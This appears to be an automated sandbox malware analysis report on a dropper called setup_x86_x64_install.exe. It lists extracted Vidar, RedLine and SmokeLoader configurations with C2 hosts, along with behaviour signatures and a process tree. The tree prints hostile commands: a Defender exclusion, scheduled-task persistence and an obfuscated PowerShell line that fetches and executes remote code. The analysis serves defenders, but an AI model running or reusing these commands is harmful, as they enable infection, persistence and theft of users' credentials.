Resubmissions

09-09-2021 17:41

210909-v9lgtabfhq 10

09-09-2021 04:26

210909-e21nrsfee3 10

08-09-2021 21:37

210908-1gnpcsfbc9 10

08-09-2021 21:29

210908-1bx1vafbc5 10

08-09-2021 13:52

210908-q6fd6shgdj 10

07-09-2021 18:07

210907-wqa3eagcgr 10

Analysis

  • max time kernel
    38s
  • max time network
    77s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    08-09-2021 21:29

General

  • Target

    setup_x86_x64_install.exe

  • Size

    2.9MB

  • MD5

    3f1f81101d0ce95fdfac97f5913cd662

  • SHA1

    8e615a64e4d72b08926242b7d73a608bdd7e9fce

  • SHA256

    90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407

  • SHA512

    a776c1f8636ef90d294becf8d09a45366463364026837c19e13227c1c5c9a6656b6fa525e0eec5a1a46997b6ef7066e958c02523a7c4538d046f8b2091145285

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://shellloader.com/welcome

Extracted

Family

vidar

Version

40.5

Botnet

706

C2

https://gheorghip.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

Jayson

C2

95.181.172.207:56915

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

40.5

Botnet

916

C2

https://gheorghip.tumblr.com/

Attributes
  • profile_id

    916

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 14 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • rl_trojan 10 IoCs

    redline stealer.

  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 26 IoCs
  • Loads dropped DLL 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 12 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 51 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1096
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:572
      • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2416
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:496
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1900
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Tue11d7385a978cc.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:504
          • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11d7385a978cc.exe
            Tue11d7385a978cc.exe
            5⤵
            • Executes dropped EXE
            PID:2508
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Tue11b9d76a96506.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3920
          • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11b9d76a96506.exe
            Tue11b9d76a96506.exe
            5⤵
            • Executes dropped EXE
            PID:3952
            • C:\Users\Admin\AppData\Local\Temp\is-M2TN5.tmp\Tue11b9d76a96506.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-M2TN5.tmp\Tue11b9d76a96506.tmp" /SL5="$6004E,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11b9d76a96506.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:4320
              • C:\Users\Admin\AppData\Local\Temp\is-LVCVE.tmp\46807GHF____.exe
                "C:\Users\Admin\AppData\Local\Temp\is-LVCVE.tmp\46807GHF____.exe" /S /UID=burnerch2
                7⤵
                • Executes dropped EXE
                PID:4852
                • C:\Program Files\Windows Sidebar\CTGJMWJDOG\ultramediaburner.exe
                  "C:\Program Files\Windows Sidebar\CTGJMWJDOG\ultramediaburner.exe" /VERYSILENT
                  8⤵
                    PID:4608
                    • C:\Users\Admin\AppData\Local\Temp\is-PSSH0.tmp\ultramediaburner.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-PSSH0.tmp\ultramediaburner.tmp" /SL5="$B0048,281924,62464,C:\Program Files\Windows Sidebar\CTGJMWJDOG\ultramediaburner.exe" /VERYSILENT
                      9⤵
                        PID:5152
                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                          "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                          10⤵
                            PID:1016
                      • C:\Users\Admin\AppData\Local\Temp\db-9819e-899-60a9e-76d7d7e43dd89\Halusyroke.exe
                        "C:\Users\Admin\AppData\Local\Temp\db-9819e-899-60a9e-76d7d7e43dd89\Halusyroke.exe"
                        8⤵
                          PID:5788
                        • C:\Users\Admin\AppData\Local\Temp\7d-e8d3a-316-7f68c-72ff4dfd5646e\Batypunoqy.exe
                          "C:\Users\Admin\AppData\Local\Temp\7d-e8d3a-316-7f68c-72ff4dfd5646e\Batypunoqy.exe"
                          8⤵
                            PID:4264
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xi2aauek.zpl\GcleanerEU.exe /eufive & exit
                              9⤵
                                PID:6280
                                • C:\Users\Admin\AppData\Local\Temp\xi2aauek.zpl\GcleanerEU.exe
                                  C:\Users\Admin\AppData\Local\Temp\xi2aauek.zpl\GcleanerEU.exe /eufive
                                  10⤵
                                    PID:6728
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0jzf5444.n3k\installer.exe /qn CAMPAIGN="654" & exit
                                  9⤵
                                    PID:6480
                                    • C:\Users\Admin\AppData\Local\Temp\0jzf5444.n3k\installer.exe
                                      C:\Users\Admin\AppData\Local\Temp\0jzf5444.n3k\installer.exe /qn CAMPAIGN="654"
                                      10⤵
                                        PID:6972
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0zpiqcfb.hfs\anyname.exe & exit
                                      9⤵
                                        PID:6736
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pdqrf5ow.j5x\gcleaner.exe /mixfive & exit
                                        9⤵
                                          PID:6964
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c Tue11f251db82fb7b.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3892
                                • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11f251db82fb7b.exe
                                  Tue11f251db82fb7b.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3716
                                  • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4952
                                    • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                      "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      PID:5112
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                        8⤵
                                          PID:6052
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                            9⤵
                                            • Creates scheduled task(s)
                                            PID:5460
                                        • C:\Users\Admin\AppData\Roaming\services64.exe
                                          "C:\Users\Admin\AppData\Roaming\services64.exe"
                                          8⤵
                                            PID:6600
                                        • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                                          "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5096
                                          • C:\Users\Admin\AppData\Roaming\5414925.exe
                                            "C:\Users\Admin\AppData\Roaming\5414925.exe"
                                            8⤵
                                              PID:5604
                                            • C:\Users\Admin\AppData\Roaming\5554704.exe
                                              "C:\Users\Admin\AppData\Roaming\5554704.exe"
                                              8⤵
                                                PID:5692
                                              • C:\Users\Admin\AppData\Roaming\3216963.exe
                                                "C:\Users\Admin\AppData\Roaming\3216963.exe"
                                                8⤵
                                                  PID:6080
                                                • C:\Users\Admin\AppData\Roaming\8879222.exe
                                                  "C:\Users\Admin\AppData\Roaming\8879222.exe"
                                                  8⤵
                                                    PID:5748
                                                • C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:4384
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im Alfanewfile2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe" & del C:\ProgramData\*.dll & exit
                                                    8⤵
                                                      PID:4408
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im Alfanewfile2.exe /f
                                                        9⤵
                                                        • Kills process with taskkill
                                                        PID:4764
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout /t 6
                                                        9⤵
                                                        • Delays execution with timeout.exe
                                                        PID:6076
                                                  • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                                    7⤵
                                                      PID:472
                                                      • C:\Windows\system32\WerFault.exe
                                                        C:\Windows\system32\WerFault.exe -u -p 472 -s 1528
                                                        8⤵
                                                        • Program crash
                                                        PID:5284
                                                    • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                      7⤵
                                                        PID:3624
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 804
                                                          8⤵
                                                          • Program crash
                                                          PID:4936
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 848
                                                          8⤵
                                                          • Program crash
                                                          PID:5212
                                                      • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                        7⤵
                                                          PID:3556
                                                          • C:\Users\Admin\AppData\Local\Temp\is-83E96.tmp\setup_2.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-83E96.tmp\setup_2.tmp" /SL5="$30202,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                            8⤵
                                                              PID:1216
                                                              • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                9⤵
                                                                  PID:5652
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-BH7BB.tmp\setup_2.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-BH7BB.tmp\setup_2.tmp" /SL5="$2022A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                    10⤵
                                                                      PID:5768
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-Q9T76.tmp\postback.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-Q9T76.tmp\postback.exe" ss1
                                                                        11⤵
                                                                          PID:5476
                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                            explorer.exe ss1
                                                                            12⤵
                                                                              PID:5520
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                                13⤵
                                                                                  PID:4844
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                                    14⤵
                                                                                      PID:4276
                                                                      • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                                        7⤵
                                                                          PID:1460
                                                                          • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                                            8⤵
                                                                              PID:6096
                                                                          • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                            7⤵
                                                                              PID:5324
                                                                            • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                              7⤵
                                                                                PID:5452
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c Tue1109eec571ac.exe /mixone
                                                                          4⤵
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:2396
                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue1109eec571ac.exe
                                                                            Tue1109eec571ac.exe /mixone
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            PID:4120
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 656
                                                                              6⤵
                                                                              • Program crash
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4740
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 776
                                                                              6⤵
                                                                              • Program crash
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4820
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 764
                                                                              6⤵
                                                                              • Program crash
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4844
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 820
                                                                              6⤵
                                                                              • Program crash
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4880
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 840
                                                                              6⤵
                                                                              • Program crash
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4828
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 896
                                                                              6⤵
                                                                              • Program crash
                                                                              PID:1348
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 1164
                                                                              6⤵
                                                                              • Program crash
                                                                              PID:5380
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c Tue11bc0507b56295.exe
                                                                          4⤵
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:2480
                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11bc0507b56295.exe
                                                                            Tue11bc0507b56295.exe
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Checks SCSI registry key(s)
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:3832
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c Tue11e4e580f2e8141a3.exe
                                                                          4⤵
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:636
                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                            Tue11e4e580f2e8141a3.exe
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:4016
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:4432
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:4596
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:4792
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:4996
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:2712
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:4604
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:4560
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                              6⤵
                                                                                PID:4600
                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                6⤵
                                                                                  PID:4748
                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                  6⤵
                                                                                    PID:584
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                    6⤵
                                                                                      PID:5260
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                      6⤵
                                                                                        PID:5868
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                        6⤵
                                                                                          PID:5176
                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                          6⤵
                                                                                            PID:6088
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                            6⤵
                                                                                              PID:4132
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                              6⤵
                                                                                                PID:4476
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                                6⤵
                                                                                                  PID:5992
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                                  6⤵
                                                                                                    PID:5544
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                                    6⤵
                                                                                                      PID:6348
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11e4e580f2e8141a3.exe
                                                                                                      6⤵
                                                                                                        PID:6880
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c Tue11141271fbe5877f.exe
                                                                                                    4⤵
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:3944
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue11141271fbe5877f.exe
                                                                                                      Tue11141271fbe5877f.exe
                                                                                                      5⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:3028
                                                                                                      • C:\ProgramData\8397238.exe
                                                                                                        "C:\ProgramData\8397238.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:2224
                                                                                                      • C:\ProgramData\5670385.exe
                                                                                                        "C:\ProgramData\5670385.exe"
                                                                                                        6⤵
                                                                                                          PID:4928
                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                            7⤵
                                                                                                              PID:3276
                                                                                                          • C:\ProgramData\5398725.exe
                                                                                                            "C:\ProgramData\5398725.exe"
                                                                                                            6⤵
                                                                                                              PID:3116
                                                                                                            • C:\ProgramData\1556047.exe
                                                                                                              "C:\ProgramData\1556047.exe"
                                                                                                              6⤵
                                                                                                                PID:1872
                                                                                                              • C:\ProgramData\3419307.exe
                                                                                                                "C:\ProgramData\3419307.exe"
                                                                                                                6⤵
                                                                                                                  PID:4940
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c Tue118f55232e4.exe
                                                                                                              4⤵
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:3864
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue118f55232e4.exe
                                                                                                                Tue118f55232e4.exe
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:4100
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                  6⤵
                                                                                                                    PID:2252
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /f /im chrome.exe
                                                                                                                      7⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:4464
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c Tue112c483dd3245d.exe
                                                                                                                4⤵
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:1492
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC32F4054\Tue112c483dd3245d.exe
                                                                                                                  Tue112c483dd3245d.exe
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:200
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 200 -s 1156
                                                                                                                    6⤵
                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                    • Program crash
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:4824
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2416 -s 472
                                                                                                                4⤵
                                                                                                                • Program crash
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:4960
                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                          1⤵
                                                                                                          • Process spawned unexpected child process
                                                                                                          PID:5780
                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                            2⤵
                                                                                                              PID:5792
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                            1⤵
                                                                                                              PID:5996
                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Adds Run key to start application
                                                                                                              PID:4928
                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                              1⤵
                                                                                                              • Process spawned unexpected child process
                                                                                                              PID:6052
                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                2⤵
                                                                                                                  PID:5656
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\6310.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\6310.exe
                                                                                                                1⤵
                                                                                                                  PID:6612

                                                                                                                Network

                                                                                                                MITRE ATT&CK Enterprise v6

                                                                                                                Replay Monitor

                                                                                                                Loading Replay Monitor...

                                                                                                                Downloads

